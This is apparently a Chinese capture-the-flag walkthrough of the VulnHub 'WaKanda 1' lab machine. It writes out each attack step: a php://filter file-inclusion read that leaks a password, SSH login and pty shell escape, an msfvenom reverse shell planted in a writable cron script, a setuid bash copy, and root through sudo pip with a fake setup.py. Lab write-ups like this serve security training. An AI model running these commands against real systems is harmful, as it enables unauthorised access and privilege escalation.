VulnHub_WaKanda_1


发现目标主机

使用nmap扫描网段,找到目标主机

nmap 192.168.1.0/24

VulnHub_WaKanda_1_第1张图片

扫描目标主机开放端口

使用nmap探测目标主机开放的端口

sudo nmap -A 192.168.1.7

VulnHub_WaKanda_1_第2张图片

访问80端口网站
VulnHub_WaKanda_1_第3张图片
网页中没有任何有价值的信息
查看源代码,发现有一行注释,我们在浏览器试试
VulnHub_WaKanda_1_第4张图片
打开发现这应该是一个德语的首页
VulnHub_WaKanda_1_第5张图片
然后,尝试访问以下组合

http://192.168.1.7/?lang=fr

VulnHub_WaKanda_1_第6张图片

http://192.168.1.7/fr.php

VulnHub_WaKanda_1_第7张图片

http://192.168.1.7/?lang=index

VulnHub_WaKanda_1_第8张图片

http://192.168.1.7/index.php

VulnHub_WaKanda_1_第9张图片
怀疑这个地方可能存在文件包含漏洞,我们使用PHP中的Filter协议来读取文件

sudo curl http://192.168.1.7/?lang=php://filter/read=convert.base64-encode/resource=index

VulnHub_WaKanda_1_第10张图片
可以读取到index.php的内容,但是发现头部是被加密的
使用base64进行解密

sudo curl http://192.168.1.7/?lang=php://filter/read=convert.base64-encode/resource=index | head -n 1 | base64 -d

VulnHub_WaKanda_1_第11张图片
通过解密后的结果我们得到一个密码

$password ="Niamey4Ever227!!!" ;//I have to remember it

在网页中有网站作者的提示'Made By@mamadou',nmap探测结果中我们知道SSH端口是3333,,现在我们使用ssh去连接目标主机

ssh [email protected] -p 3333

VulnHub_WaKanda_1_第12张图片
登录之后发现这是一个Python2.7的命令行环境
首先导入pty包,然后获取一个交互式Shell

import pty;
pty.spawn('/bin/bash');


查看文件得到第一个flag

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc

VulnHub_WaKanda_1_第13张图片
查看devops的家目录下存在flag2,但是没有权限读取
VulnHub_WaKanda_1_第14张图片
查找属于devops用户的文件,看看有没有可以利用的

find / -user devops 2>/dev/null

VulnHub_WaKanda_1_第15张图片
发现srv目录下存在一个py文件

查看文件只有一个在/tmp/下创建test文件的功能

但是发现这个文件可以被任意用户修改,我们写入查看flag的代码

with open('/home/devops/flag2.txt','r') as f:
    open('/tmp/flag2.txt','w').write(f.read())


查看/tmp/flag2.txt得到flag2

cat /tmp/flag2.txt


使用msfvenom生成python的反弹shell

sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.1.11 lport=4444 R


在攻击机中使用nc进行监听4444端口

sudo nc -lvp 4444


在.antivirus.py中写入生成的代码

执行py文件

将py文件修改为以下内容

import os
os.system("cp /bin/bash /tmp/dbash")
os.system("chmod 6775 /tmp/dbash")

5分钟后生成了dbash
VulnHub_WaKanda_1_第16张图片
查看Flag2

现在我们需要一个devops的shell,我们继续修改py文件的代码
VulnHub_WaKanda_1_第17张图片
kali上监听3344端口

大约5分钟后返回一个shell

查看用户权限为devops
VulnHub_WaKanda_1_第18张图片
查看发现pip可以以root权限执行
VulnHub_WaKanda_1_第19张图片
查阅发现《sudo pip install privesc》这篇文章可以使用pip进行提权
https://www.root4loot.com/post/pip-install-privilege-escalation/
下载setup.py文件到本地

git clone https://github.com/0x00-0x00/FakePip.git

VulnHub_WaKanda_1_第20张图片
本地使用python搭建HTTP服务,在目标机器上下载setup.py

sudo python -m SimpleHTTPServer 3322

VulnHub_WaKanda_1_第21张图片
在目标机器上下载文件

wget http://192.168.1.11:3322/setup.py

根据setup.py中的代码,我们继续监听13372端口
sudo nc -lvp 13372


执行下面的命令

sudo pip install --upgrade --force-reinstall

VulnHub_WaKanda_1_第22张图片
查看监听端口,返回一个shell
VulnHub_WaKanda_1_第23张图片
查看权限是root权限

进入root目录查看flag
VulnHub_WaKanda_1_第24张图片
最终得到最后一个Flag

821ae63dbe0c573eff8b69d451fb21bc

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

你可能感兴趣的:(VulnHub_WaKanda_1)